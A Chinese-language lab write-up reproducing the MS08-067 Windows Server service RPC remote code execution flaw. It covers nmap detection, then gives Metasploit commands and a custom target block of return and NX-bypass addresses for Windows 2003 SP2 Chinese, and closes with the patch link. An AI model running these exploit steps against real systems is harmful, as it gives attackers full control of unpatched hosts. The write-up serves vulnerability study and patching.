漏洞描述
Windows 系统上的服务器服务中存在一个远程执行代码漏洞。 该漏洞是由于服务不正确地处理特制的 RPC 请求导致的。 成功利用此漏洞的攻击者可以完全控制受影响的系统。
影响系统
- Windows Vista
- Windows 2000 Service
- Windows Server 2008
- Windows Server 2003
- Windows XP
漏洞检测
nmap进行漏洞检测
#nmap 目标ip --script=smb-vuln-ms08-067.nse
nmap 192.168.234.129 --script=smb-vuln-ms08-067.nse
提示VULNERABLE
表示漏洞存在
漏洞利用
漏洞利用工具为msf,我复现的系统为Windows Server 2003 SP2 中文版。但我发现msf中没有中文版 的 exp 框架。
添加漏洞利用代码:
#修改msf漏洞利用代码
vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi.rb
添加以下内容:
[ 'Windows 2003 SP2 Chinese (NX)',
{
'RetDec' => 0x7c99beb8, # dec ESI, ret @NTDLL.DLL (0x4EC3)
'RetPop' => 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
'JmpESP' => 0x7c99a01b, # jmp ESP @NTDLL.DLL(0xFFE4)
'DisableNX' => 0x7c96f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
#进入msf
msfconsole
#查找漏洞框架并调用
search ms08-067
use exploit/windows/smb/ms08_067_netapi
查看系统exp框架时,可以看到我们添加的windwos 2003 SP2 Chinese
show targets
设置好目标ip及其他参数,即可开始攻击
set target 1
set rhost 192.168.234.129
show options
漏洞加固
微软已发布MS08-067补丁:
http://technet.microsoft.com/zh-cn/security/bulletin/ms08-067